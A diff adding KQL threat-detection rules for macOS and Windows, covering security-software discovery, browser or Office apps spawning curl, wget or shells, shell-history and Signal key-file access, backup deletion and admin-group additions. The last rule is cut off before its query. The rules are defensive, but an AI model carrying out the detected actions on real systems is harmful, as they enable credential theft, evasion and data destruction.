index 00000000..42dc015a
--- /dev/null
+++ b/KQL/rules/macos/process_creation/screen_capture_macos.kql
@@ -0,0 +1,12 @@
+// Title: Screen Capture - macOS
+// Author: remotephone, oscd.community
+// Date: 2020-10-13
+// Level: low
+// Description: Detects attempts to use screencapture to collect macOS screenshots
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.t1113
+// False Positives:
+//   - Legitimate user activity taking screenshots
+
+DeviceProcessEvents
+| where FolderPath =~ "/usr/sbin/screencapture"
\ No newline at end of file
diff --git a/KQL/rules/macos/process_creation/security_software_discovery_macos.kql b/KQL/rules/macos/process_creation/security_software_discovery_macos.kql
new file mode 100644
index 00000000..31c19c30
--- /dev/null
+++ b/KQL/rules/macos/process_creation/security_software_discovery_macos.kql
@@ -0,0 +1,12 @@
+// Title: Security Software Discovery - MacOs
+// Author: Daniil Yugoslavskiy, oscd.community
+// Date: 2020-10-19
+// Level: medium
+// Description: Detects usage of system utilities (only grep for now) to discover security software discovery
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1518.001
+// False Positives:
+//   - Legitimate activities
+
+DeviceProcessEvents
+| where FolderPath =~ "/usr/bin/grep" and ((ProcessCommandLine contains "nessusd" or ProcessCommandLine contains "santad" or ProcessCommandLine contains "CbDefense" or ProcessCommandLine contains "falcond" or ProcessCommandLine contains "td-agent" or ProcessCommandLine contains "packetbeat" or ProcessCommandLine contains "filebeat" or ProcessCommandLine contains "auditbeat" or ProcessCommandLine contains "osqueryd" or ProcessCommandLine contains "BlockBlock" or ProcessCommandLine contains "LuLu") or (ProcessCommandLine contains "Little" and ProcessCommandLine contains "Snitch"))
\ No newline at end of file
diff --git a/KQL/rules/macos/process_creation/space_after_filename_macos.kql b/KQL/rules/macos/process_creation/space_after_filename_macos.kql
new file mode 100644
index 00000000..6dce835b
--- /dev/null
+++ b/KQL/rules/macos/process_creation/space_after_filename_macos.kql
@@ -0,0 +1,12 @@
+// Title: Space After Filename - macOS
+// Author: remotephone
+// Date: 2021-11-20
+// Level: low
+// Description: Detects attempts to masquerade as legitimate files by adding a space to the end of the filename.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036.006
+// False Positives:
+//   - Mistyped commands or legitimate binaries named to match the pattern
+
+DeviceProcessEvents
+| where ProcessCommandLine endswith " " or FolderPath endswith " "
\ No newline at end of file
diff --git a/KQL/rules/macos/process_creation/split_a_file_into_pieces.kql b/KQL/rules/macos/process_creation/split_a_file_into_pieces.kql
new file mode 100644
index 00000000..1a657308
--- /dev/null
+++ b/KQL/rules/macos/process_creation/split_a_file_into_pieces.kql
@@ -0,0 +1,12 @@
+// Title: Split A File Into Pieces
+// Author: Igor Fits, Mikhail Larin, oscd.community
+// Date: 2020-10-15
+// Level: low
+// Description: Detection use of the command "split" to split files into parts and possible transfer.
+// MITRE Tactic: Exfiltration
+// Tags: attack.exfiltration, attack.t1030
+// False Positives:
+//   - Legitimate administrative activity
+
+DeviceProcessEvents
+| where FolderPath endswith "/split"
\ No newline at end of file
diff --git a/KQL/rules/macos/process_creation/suspicious_browser_child_process_macos.kql b/KQL/rules/macos/process_creation/suspicious_browser_child_process_macos.kql
new file mode 100644
index 00000000..384b570f
--- /dev/null
+++ b/KQL/rules/macos/process_creation/suspicious_browser_child_process_macos.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious Browser Child Process - MacOS
+// Author: Sohan G (D4rkCiph3r)
+// Date: 2023-04-05
+// Level: medium
+// Description: Detects suspicious child processes spawned from browsers. This could be a result of a potential web browser exploitation.
+// MITRE Tactic: Initial Access
+// Tags: attack.initial-access, attack.execution, attack.t1189, attack.t1203, attack.t1059
+// False Positives:
+//   - Legitimate browser install, update and recovery scripts
+
+DeviceProcessEvents
+| where ((FolderPath endswith "/bash" or FolderPath endswith "/curl" or FolderPath endswith "/dash" or FolderPath endswith "/ksh" or FolderPath endswith "/osascript" or FolderPath endswith "/perl" or FolderPath endswith "/php" or FolderPath endswith "/pwsh" or FolderPath endswith "/python" or FolderPath endswith "/sh" or FolderPath endswith "/tcsh" or FolderPath endswith "/wget" or FolderPath endswith "/zsh") and (InitiatingProcessFolderPath contains "com.apple.WebKit.WebContent" or InitiatingProcessFolderPath contains "firefox" or InitiatingProcessFolderPath contains "Google Chrome Helper" or InitiatingProcessFolderPath contains "Google Chrome" or InitiatingProcessFolderPath contains "Microsoft Edge" or InitiatingProcessFolderPath contains "Opera" or InitiatingProcessFolderPath contains "Safari" or InitiatingProcessFolderPath contains "Tor Browser")) and (not(((((ProcessCommandLine contains "/Volumes/Google Chrome/Google Chrome.app/Contents/Frameworks/" and ProcessCommandLine contains "/Resources/install.sh") or (ProcessCommandLine contains "/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/" and ProcessCommandLine contains "/Resources/keystone_promote_preflight.sh") or (ProcessCommandLine contains "/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/" and ProcessCommandLine contains "/Resources/keystone_promote_postflight.sh")) and (InitiatingProcessFolderPath contains "Google Chrome Helper" or InitiatingProcessFolderPath contains "Google Chrome")) or ((ProcessCommandLine contains "/Users/" and ProcessCommandLine contains "/Library/Application Support/Google/Chrome/recovery/" and ProcessCommandLine contains "/ChromeRecovery") and (InitiatingProcessFolderPath contains "Google Chrome Helper" or InitiatingProcessFolderPath contains "Google Chrome")) or ProcessCommandLine contains "--defaults-torrc" or ProcessCommandLine =~ "*/Library/Application Support/Microsoft/MAU*/Microsoft AutoUpdate.app/Contents/MacOS/msupdate*" or ((ProcessCommandLine contains "IOPlatformExpertDevice" or ProcessCommandLine contains "hw.model") and InitiatingProcessFolderPath contains "Microsoft Edge")))) and (not((ProcessCommandLine =~ "" or isnull(ProcessCommandLine))))
\ No newline at end of file
diff --git a/KQL/rules/macos/process_creation/suspicious_execution_via_macos_script_editor.kql b/KQL/rules/macos/process_creation/suspicious_execution_via_macos_script_editor.kql
new file mode 100644
index 00000000..f247de83
--- /dev/null
+++ b/KQL/rules/macos/process_creation/suspicious_execution_via_macos_script_editor.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Execution via macOS Script Editor
+// Author: Tim Rauch (rule), Elastic (idea)
+// Date: 2022-10-21
+// Level: medium
+// Description: Detects when the macOS Script Editor utility spawns an unusual child process.
+// MITRE Tactic: Initial Access
+// Tags: attack.t1566, attack.t1566.002, attack.initial-access, attack.t1059, attack.t1059.002, attack.t1204, attack.t1204.001, attack.execution, attack.persistence, attack.t1553, attack.defense-evasion
+
+DeviceProcessEvents
+| where ((FolderPath endswith "/curl" or FolderPath endswith "/bash" or FolderPath endswith "/sh" or FolderPath endswith "/zsh" or FolderPath endswith "/dash" or FolderPath endswith "/fish" or FolderPath endswith "/osascript" or FolderPath endswith "/mktemp" or FolderPath endswith "/chmod" or FolderPath endswith "/php" or FolderPath endswith "/nohup" or FolderPath endswith "/openssl" or FolderPath endswith "/plutil" or FolderPath endswith "/PlistBuddy" or FolderPath endswith "/xattr" or FolderPath endswith "/sqlite" or FolderPath endswith "/funzip" or FolderPath endswith "/popen") or (FolderPath contains "python" or FolderPath contains "perl")) and InitiatingProcessFolderPath endswith "/Script Editor"
\ No newline at end of file
diff --git a/KQL/rules/macos/process_creation/suspicious_history_file_operations.kql b/KQL/rules/macos/process_creation/suspicious_history_file_operations.kql
new file mode 100644
index 00000000..a9250bc4
--- /dev/null
+++ b/KQL/rules/macos/process_creation/suspicious_history_file_operations.kql
@@ -0,0 +1,13 @@
+// Title: Suspicious History File Operations
+// Author: Mikhail Larin, oscd.community
+// Date: 2020-10-17
+// Level: medium
+// Description: Detects commandline operations on shell history files
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1552.003
+// False Positives:
+//   - Legitimate administrative activity
+//   - Legitimate software, cleaning hist file
+
+DeviceProcessEvents
+| where ProcessCommandLine contains ".bash_history" or ProcessCommandLine contains ".zsh_history" or ProcessCommandLine contains ".zhistory" or ProcessCommandLine contains ".history" or ProcessCommandLine contains ".sh_history" or ProcessCommandLine contains "fish_history"
\ No newline at end of file
diff --git a/KQL/rules/macos/process_creation/suspicious_installer_package_child_process.kql b/KQL/rules/macos/process_creation/suspicious_installer_package_child_process.kql
new file mode 100644
index 00000000..926df4fa
--- /dev/null
+++ b/KQL/rules/macos/process_creation/suspicious_installer_package_child_process.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious Installer Package Child Process
+// Author: Sohan G (D4rkCiph3r)
+// Date: 2023-02-18
+// Level: medium
+// Description: Detects the execution of suspicious child processes from macOS installer package parent process. This includes osascript, JXA, curl and wget amongst other interpreters
+// MITRE Tactic: Execution
+// Tags: attack.t1059, attack.t1059.007, attack.t1071, attack.t1071.001, attack.execution, attack.command-and-control
+// False Positives:
+//   - Legitimate software uses the scripts (preinstall, postinstall)
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "preinstall" or ProcessCommandLine contains "postinstall") and (FolderPath endswith "/sh" or FolderPath endswith "/bash" or FolderPath endswith "/dash" or FolderPath endswith "/python" or FolderPath endswith "/ruby" or FolderPath endswith "/perl" or FolderPath endswith "/php" or FolderPath endswith "/javascript" or FolderPath endswith "/osascript" or FolderPath endswith "/tclsh" or FolderPath endswith "/curl" or FolderPath endswith "/wget") and (InitiatingProcessFolderPath endswith "/package_script_service" or InitiatingProcessFolderPath endswith "/installer")
\ No newline at end of file
diff --git a/KQL/rules/macos/process_creation/suspicious_macos_firmware_activity.kql b/KQL/rules/macos/process_creation/suspicious_macos_firmware_activity.kql
new file mode 100644
index 00000000..906b300c
--- /dev/null
+++ b/KQL/rules/macos/process_creation/suspicious_macos_firmware_activity.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious MacOS Firmware Activity
+// Author: Austin Songer @austinsonger
+// Date: 2021-09-30
+// Level: medium
+// Description: Detects when a user manipulates with Firmward Password on MacOS. NOTE - this command has been disabled on silicon-based apple computers.
+// MITRE Tactic: Impact
+// Tags: attack.impact
+// False Positives:
+//   - Legitimate administration activities
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "setpasswd" or ProcessCommandLine contains "full" or ProcessCommandLine contains "delete" or ProcessCommandLine contains "check") and FolderPath =~ "/usr/sbin/firmwarepasswd"
\ No newline at end of file
diff --git a/KQL/rules/macos/process_creation/suspicious_microsoft_office_child_process_macos.kql b/KQL/rules/macos/process_creation/suspicious_microsoft_office_child_process_macos.kql
new file mode 100644
index 00000000..a29c8335
--- /dev/null
+++ b/KQL/rules/macos/process_creation/suspicious_microsoft_office_child_process_macos.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Microsoft Office Child Process - MacOS
+// Author: Sohan G (D4rkCiph3r)
+// Date: 2023-01-31
+// Level: high
+// Description: Detects suspicious child processes spawning from microsoft office suite applications such as word or excel. This could indicates malicious macro execution
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.persistence, attack.t1059.002, attack.t1137.002, attack.t1204.002
+
+DeviceProcessEvents
+| where (FolderPath endswith "/bash" or FolderPath endswith "/curl" or FolderPath endswith "/dash" or FolderPath endswith "/fish" or FolderPath endswith "/osacompile" or FolderPath endswith "/osascript" or FolderPath endswith "/sh" or FolderPath endswith "/zsh" or FolderPath endswith "/python" or FolderPath endswith "/python3" or FolderPath endswith "/wget") and (InitiatingProcessFolderPath contains "Microsoft Word" or InitiatingProcessFolderPath contains "Microsoft Excel" or InitiatingProcessFolderPath contains "Microsoft PowerPoint" or InitiatingProcessFolderPath contains "Microsoft OneNote")
\ No newline at end of file
diff --git a/KQL/rules/macos/process_creation/system_information_discovery_using_ioreg.kql b/KQL/rules/macos/process_creation/system_information_discovery_using_ioreg.kql
new file mode 100644
index 00000000..04e5e080
--- /dev/null
+++ b/KQL/rules/macos/process_creation/system_information_discovery_using_ioreg.kql
@@ -0,0 +1,14 @@
+// Title: System Information Discovery Using Ioreg
+// Author: Joseliyo Sanchez, @Joseliyo_Jstnk
+// Date: 2023-12-20
+// Level: medium
+// Description: Detects the use of "ioreg" which will show I/O Kit registry information.
+// This process is used for system information discovery.
+// It has been observed in-the-wild by calling this process directly or using bash and grep to look for specific strings.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1082
+// False Positives:
+//   - Legitimate administrative activities
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "-l" or ProcessCommandLine contains "-c") and (ProcessCommandLine contains "AppleAHCIDiskDriver" or ProcessCommandLine contains "IOPlatformExpertDevice" or ProcessCommandLine contains "Oracle" or ProcessCommandLine contains "Parallels" or ProcessCommandLine contains "USB Vendor Name" or ProcessCommandLine contains "VirtualBox" or ProcessCommandLine contains "VMware") and (FolderPath endswith "/ioreg" or ProcessCommandLine contains "ioreg")
\ No newline at end of file
diff --git a/KQL/rules/macos/process_creation/system_information_discovery_using_sw_vers.kql b/KQL/rules/macos/process_creation/system_information_discovery_using_sw_vers.kql
new file mode 100644
index 00000000..5f7cee88
--- /dev/null
+++ b/KQL/rules/macos/process_creation/system_information_discovery_using_sw_vers.kql
@@ -0,0 +1,12 @@
+// Title: System Information Discovery Using sw_vers
+// Author: Joseliyo Sanchez, @Joseliyo_Jstnk
+// Date: 2023-12-20
+// Level: medium
+// Description: Detects the use of "sw_vers" for system information discovery
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1082
+// False Positives:
+//   - Legitimate administrative activities
+
+DeviceProcessEvents
+| where FolderPath endswith "/sw_vers" and (ProcessCommandLine contains "-buildVersion" or ProcessCommandLine contains "-productName" or ProcessCommandLine contains "-productVersion")
\ No newline at end of file
diff --git a/KQL/rules/macos/process_creation/system_information_discovery_using_system_profiler.kql b/KQL/rules/macos/process_creation/system_information_discovery_using_system_profiler.kql
new file mode 100644
index 00000000..b8bc28ec
--- /dev/null
+++ b/KQL/rules/macos/process_creation/system_information_discovery_using_system_profiler.kql
@@ -0,0 +1,13 @@
+// Title: System Information Discovery Using System_Profiler
+// Author: Stephen Lincoln `@slincoln_aiq` (AttackIQ)
+// Date: 2024-01-02
+// Level: medium
+// Description: Detects the execution of "system_profiler" with specific "Data Types" that have been seen being used by threat actors and malware. It provides system hardware and software configuration information.
+// This process is primarily used for system information discovery. However, "system_profiler" can also be used to determine if virtualization software is being run for defense evasion purposes.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.defense-evasion, attack.t1082, attack.t1497.001
+// False Positives:
+//   - Legitimate administrative activities
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "SPApplicationsDataType" or ProcessCommandLine contains "SPHardwareDataType" or ProcessCommandLine contains "SPNetworkDataType" or ProcessCommandLine contains "SPUSBDataType") and (FolderPath endswith "/system_profiler" or ProcessCommandLine contains "system_profiler")
\ No newline at end of file
diff --git a/KQL/rules/macos/process_creation/system_information_discovery_via_sysctl_macos.kql b/KQL/rules/macos/process_creation/system_information_discovery_via_sysctl_macos.kql
new file mode 100644
index 00000000..7419fa36
--- /dev/null
+++ b/KQL/rules/macos/process_creation/system_information_discovery_via_sysctl_macos.kql
@@ -0,0 +1,13 @@
+// Title: System Information Discovery Via Sysctl - MacOS
+// Author: Pratinav Chandra
+// Date: 2024-05-27
+// Level: medium
+// Description: Detects the execution of "sysctl" with specific arguments that have been used by threat actors and malware. It provides system hardware information.
+// This process is primarily used to detect and avoid virtualization and analysis environments.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1497.001, attack.discovery, attack.t1082
+// False Positives:
+//   - Legitimate administrative activities
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "hw." or ProcessCommandLine contains "kern." or ProcessCommandLine contains "machdep.") and (FolderPath endswith "/sysctl" or ProcessCommandLine contains "sysctl")
\ No newline at end of file
diff --git a/KQL/rules/macos/process_creation/system_integrity_protection_sip_disabled.kql b/KQL/rules/macos/process_creation/system_integrity_protection_sip_disabled.kql
new file mode 100644
index 00000000..5166b100
--- /dev/null
+++ b/KQL/rules/macos/process_creation/system_integrity_protection_sip_disabled.kql
@@ -0,0 +1,10 @@
+// Title: System Integrity Protection (SIP) Disabled
+// Author: Joseliyo Sanchez, @Joseliyo_Jstnk
+// Date: 2024-01-02
+// Level: medium
+// Description: Detects the use of csrutil to disable the Configure System Integrity Protection (SIP). This technique is used in post-exploit scenarios.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1518.001
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "disable" and FolderPath endswith "/csrutil"
\ No newline at end of file
diff --git a/KQL/rules/macos/process_creation/system_integrity_protection_sip_enumeration.kql b/KQL/rules/macos/process_creation/system_integrity_protection_sip_enumeration.kql
new file mode 100644
index 00000000..06cdc475
--- /dev/null
+++ b/KQL/rules/macos/process_creation/system_integrity_protection_sip_enumeration.kql
@@ -0,0 +1,12 @@
+// Title: System Integrity Protection (SIP) Enumeration
+// Author: Joseliyo Sanchez, @Joseliyo_Jstnk
+// Date: 2024-01-02
+// Level: low
+// Description: Detects the use of csrutil to view the Configure System Integrity Protection (SIP) status. This technique is used in post-exploit scenarios.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1518.001
+// False Positives:
+//   - Legitimate administration activities
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "status" and FolderPath endswith "/csrutil"
\ No newline at end of file
diff --git a/KQL/rules/macos/process_creation/system_network_connections_discovery_macos.kql b/KQL/rules/macos/process_creation/system_network_connections_discovery_macos.kql
new file mode 100644
index 00000000..d47ce49d
--- /dev/null
+++ b/KQL/rules/macos/process_creation/system_network_connections_discovery_macos.kql
@@ -0,0 +1,12 @@
+// Title: System Network Connections Discovery - MacOs
+// Author: Daniil Yugoslavskiy, oscd.community
+// Date: 2020-10-19
+// Level: informational
+// Description: Detects usage of system utilities to discover system network connections
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1049
+// False Positives:
+//   - Legitimate activities
+
+DeviceProcessEvents
+| where FolderPath endswith "/who" or FolderPath endswith "/w" or FolderPath endswith "/last" or FolderPath endswith "/lsof" or FolderPath endswith "/netstat"
\ No newline at end of file
diff --git a/KQL/rules/macos/process_creation/system_network_discovery_macos.kql b/KQL/rules/macos/process_creation/system_network_discovery_macos.kql
new file mode 100644
index 00000000..85bcf7b1
--- /dev/null
+++ b/KQL/rules/macos/process_creation/system_network_discovery_macos.kql
@@ -0,0 +1,12 @@
+// Title: System Network Discovery - macOS
+// Author: remotephone, oscd.community
+// Date: 2020-10-06
+// Level: informational
+// Description: Detects enumeration of local network configuration
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1016
+// False Positives:
+//   - Legitimate administration activities
+
+DeviceProcessEvents
+| where ((FolderPath endswith "/arp" or FolderPath endswith "/ifconfig" or FolderPath endswith "/netstat" or FolderPath endswith "/networksetup" or FolderPath endswith "/socketfilterfw") or ((ProcessCommandLine contains "/Library/Preferences/com.apple.alf" and ProcessCommandLine contains "read") and FolderPath =~ "/usr/bin/defaults")) and (not(InitiatingProcessFolderPath endswith "/wifivelocityd"))
\ No newline at end of file
diff --git a/KQL/rules/macos/process_creation/system_shutdown_reboot_macos.kql b/KQL/rules/macos/process_creation/system_shutdown_reboot_macos.kql
new file mode 100644
index 00000000..039fdd94
--- /dev/null
+++ b/KQL/rules/macos/process_creation/system_shutdown_reboot_macos.kql
@@ -0,0 +1,12 @@
+// Title: System Shutdown/Reboot - MacOs
+// Author: Igor Fits, Mikhail Larin, oscd.community
+// Date: 2020-10-19
+// Level: informational
+// Description: Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems.
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1529
+// False Positives:
+//   - Legitimate administrative activity
+
+DeviceProcessEvents
+| where FolderPath endswith "/shutdown" or FolderPath endswith "/reboot" or FolderPath endswith "/halt"
\ No newline at end of file
diff --git a/KQL/rules/macos/process_creation/time_machine_backup_deletion_attempt_via_tmutil_macos.kql b/KQL/rules/macos/process_creation/time_machine_backup_deletion_attempt_via_tmutil_macos.kql
new file mode 100644
index 00000000..a309ed3b
--- /dev/null
+++ b/KQL/rules/macos/process_creation/time_machine_backup_deletion_attempt_via_tmutil_macos.kql
@@ -0,0 +1,13 @@
+// Title: Time Machine Backup Deletion Attempt Via Tmutil - MacOS
+// Author: Pratinav Chandra
+// Date: 2024-05-29
+// Level: medium
+// Description: Detects deletion attempts of MacOS Time Machine backups via the native backup utility "tmutil".
+// An adversary may perform this action before launching a ransonware attack to prevent the victim from restoring their files.
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1490
+// False Positives:
+//   - Legitimate activities
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "delete" and (FolderPath endswith "/tmutil" or ProcessCommandLine contains "tmutil")
\ No newline at end of file
diff --git a/KQL/rules/macos/process_creation/time_machine_backup_disabled_via_tmutil_macos.kql b/KQL/rules/macos/process_creation/time_machine_backup_disabled_via_tmutil_macos.kql
new file mode 100644
index 00000000..3e5197f8
--- /dev/null
+++ b/KQL/rules/macos/process_creation/time_machine_backup_disabled_via_tmutil_macos.kql
@@ -0,0 +1,13 @@
+// Title: Time Machine Backup Disabled Via Tmutil - MacOS
+// Author: Pratinav Chandra
+// Date: 2024-05-29
+// Level: medium
+// Description: Detects disabling of Time Machine (Apple's automated backup utility software) via the native macOS backup utility "tmutil".
+// An attacker can use this to prevent backups from occurring.
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1490
+// False Positives:
+//   - Legitimate administrator activity
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "disable" and (FolderPath endswith "/tmutil" or ProcessCommandLine contains "tmutil")
\ No newline at end of file
diff --git a/KQL/rules/macos/process_creation/user_added_to_admin_group_via_dscl.kql b/KQL/rules/macos/process_creation/user_added_to_admin_group_via_dscl.kql
new file mode 100644
index 00000000..ddb60274
--- /dev/null
+++ b/KQL/rules/macos/process_creation/user_added_to_admin_group_via_dscl.kql
@@ -0,0 +1,12 @@
+// Title: User Added To Admin Group Via Dscl
+// Author: Sohan G (D4rkCiph3r)
+// Date: 2023-03-19
+// Level: medium
+// Description: Detects attempts to create and add an account to the admin group via "dscl"
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.initial-access, attack.privilege-escalation, attack.t1078.003
+// False Positives:
+//   - Legitimate administration activities
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " -append " and ProcessCommandLine contains " /Groups/admin " and ProcessCommandLine contains " GroupMembership ") and FolderPath endswith "/dscl"
\ No newline at end of file
diff --git a/KQL/rules/macos/process_creation/user_added_to_admin_group_via_dseditgroup.kql b/KQL/rules/macos/process_creation/user_added_to_admin_group_via_dseditgroup.kql
new file mode 100644
index 00000000..1017b5ae
--- /dev/null
+++ b/KQL/rules/macos/process_creation/user_added_to_admin_group_via_dseditgroup.kql
@@ -0,0 +1,12 @@
+// Title: User Added To Admin Group Via DseditGroup
+// Author: Sohan G (D4rkCiph3r)
+// Date: 2023-08-22
+// Level: medium
+// Description: Detects attempts to create and/or add an account to the admin group, thus granting admin privileges.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.initial-access, attack.privilege-escalation, attack.t1078.003
+// False Positives:
+//   - Legitimate administration activities
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " -o edit " and ProcessCommandLine contains " -a " and ProcessCommandLine contains " -t user" and ProcessCommandLine contains "admin") and FolderPath endswith "/dseditgroup"
\ No newline at end of file
diff --git a/KQL/rules/macos/process_creation/user_added_to_admin_group_via_sysadminctl.kql b/KQL/rules/macos/process_creation/user_added_to_admin_group_via_sysadminctl.kql
new file mode 100644
index 00000000..3de1e977
--- /dev/null
+++ b/KQL/rules/macos/process_creation/user_added_to_admin_group_via_sysadminctl.kql
@@ -0,0 +1,12 @@
+// Title: User Added To Admin Group Via Sysadminctl
+// Author: Sohan G (D4rkCiph3r)
+// Date: 2023-03-19
+// Level: medium
+// Description: Detects attempts to create and add an account to the admin group via "sysadminctl"
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.initial-access, attack.privilege-escalation, attack.t1078.003
+// False Positives:
+//   - Legitimate administration activities
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " -addUser " and ProcessCommandLine contains " -admin ") and FolderPath endswith "/sysadminctl"
\ No newline at end of file
diff --git a/KQL/rules/windows/builtin/security/account_management/outgoing_logon_with_new_credentials.kql b/KQL/rules/windows/builtin/security/account_management/outgoing_logon_with_new_credentials.kql
new file mode 100644
index 00000000..e1e7be01
--- /dev/null
+++ b/KQL/rules/windows/builtin/security/account_management/outgoing_logon_with_new_credentials.kql
@@ -0,0 +1,12 @@
+// Title: Outgoing Logon with New Credentials
+// Author: Max Altgelt (Nextron Systems)
+// Date: 2022-04-06
+// Level: low
+// Description: Detects logon events that specify new credentials
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.lateral-movement, attack.t1550
+// False Positives:
+//   - Legitimate remote administration activity
+
+DeviceLogonEvents
+| where LogonType == 9
\ No newline at end of file
diff --git a/KQL/rules/windows/builtin/security/account_management/successful_account_login_via_wmi.kql b/KQL/rules/windows/builtin/security/account_management/successful_account_login_via_wmi.kql
new file mode 100644
index 00000000..e2c25695
--- /dev/null
+++ b/KQL/rules/windows/builtin/security/account_management/successful_account_login_via_wmi.kql
@@ -0,0 +1,13 @@
+// Title: Successful Account Login Via WMI
+// Author: Thomas Patzke
+// Date: 2019-12-04
+// Level: low
+// Description: Detects successful logon attempts performed with WMI
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1047
+// False Positives:
+//   - Monitoring tools
+//   - Legitimate system administration
+
+DeviceLogonEvents
+| where InitiatingProcessFolderPath endswith "\\WmiPrvSE.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/builtin/security/azure_ad_health_monitoring_agent_registry_keys_access.kql b/KQL/rules/windows/builtin/security/azure_ad_health_monitoring_agent_registry_keys_access.kql
new file mode 100644
index 00000000..ebd0a0c3
--- /dev/null
+++ b/KQL/rules/windows/builtin/security/azure_ad_health_monitoring_agent_registry_keys_access.kql
@@ -0,0 +1,11 @@
+// Title: Azure AD Health Monitoring Agent Registry Keys Access
+// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC
+// Date: 2021-08-26
+// Level: medium
+// Description: This detection uses Windows security events to detect suspicious access attempts to the registry key of Azure AD Health monitoring agent.
+// This detection requires an access control entry (ACE) on the system access control list (SACL) of the following securable object HKLM\SOFTWARE\Microsoft\Microsoft Online\Reporting\MonitoringAgent.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1012
+
+DeviceRegistryEvents
+| where RegistryKey =~ "\\REGISTRY\\MACHINE\\SOFTWARE\\Microsoft\\Microsoft Online\\Reporting\\MonitoringAgent" and (not((InitiatingProcessFolderPath contains "Microsoft.Identity.Health.Adfs.DiagnosticsAgent.exe" or InitiatingProcessFolderPath contains "Microsoft.Identity.Health.Adfs.InsightsService.exe" or InitiatingProcessFolderPath contains "Microsoft.Identity.Health.Adfs.MonitoringAgent.Startup.exe" or InitiatingProcessFolderPath contains "Microsoft.Identity.Health.Adfs.PshSurrogate.exe" or InitiatingProcessFolderPath contains "Microsoft.Identity.Health.Common.Clients.ResourceMonitor.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/builtin/security/azure_ad_health_service_agents_registry_keys_access.kql b/KQL/rules/windows/builtin/security/azure_ad_health_service_agents_registry_keys_access.kql
new file mode 100644
index 00000000..14234cf9
--- /dev/null
+++ b/KQL/rules/windows/builtin/security/azure_ad_health_service_agents_registry_keys_access.kql
@@ -0,0 +1,13 @@
+// Title: Azure AD Health Service Agents Registry Keys Access
+// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC
+// Date: 2021-08-26
+// Level: medium
+// Description: This detection uses Windows security events to detect suspicious access attempts to the registry key values and sub-keys of Azure AD Health service agents (e.g AD FS).
+// Information from AD Health service agents can be used to potentially abuse some of the features provided by those services in the cloud (e.g. Federation).
+// This detection requires an access control entry (ACE) on the system access control list (SACL) of the following securable object: HKLM:\SOFTWARE\Microsoft\ADHealthAgent.
+// Make sure you set the SACL to propagate to its sub-keys.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1012
+
+DeviceRegistryEvents
+| where RegistryKey =~ "\\REGISTRY\\MACHINE\\SOFTWARE\\Microsoft\\ADHealthAgent" and (not((InitiatingProcessFolderPath contains "Microsoft.Identity.Health.Adfs.DiagnosticsAgent.exe" or InitiatingProcessFolderPath contains "Microsoft.Identity.Health.Adfs.InsightsService.exe" or InitiatingProcessFolderPath contains "Microsoft.Identity.Health.Adfs.MonitoringAgent.Startup.exe" or InitiatingProcessFolderPath contains "Microsoft.Identity.Health.Adfs.PshSurrogate.exe" or InitiatingProcessFolderPath contains "Microsoft.Identity.Health.Common.Clients.ResourceMonitor.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/builtin/security/file_access_of_signal_desktop_sensitive_data.kql b/KQL/rules/windows/builtin/security/file_access_of_signal_desktop_sensitive_data.kql
new file mode 100644
index 00000000..622f8b7a
--- /dev/null
+++ b/KQL/rules/windows/builtin/security/file_access_of_signal_desktop_sensitive_data.kql
@@ -0,0 +1,15 @@
+// Title: File Access Of Signal Desktop Sensitive Data
+// Author: Andreas Braathen (mnemonic.io)
+// Date: 2025-10-19
+// Level: medium
+// Description: Detects access to Signal Desktop's sensitive data files: db.sqlite and config.json.
+// The db.sqlite file in Signal Desktop stores all locally saved messages in an encrypted SQLite database, while the config.json contains the decryption key needed to access that data.
+// Since the key is stored in plain text, a threat actor who gains access to both files can decrypt and read sensitive messages without needing the users credentials.
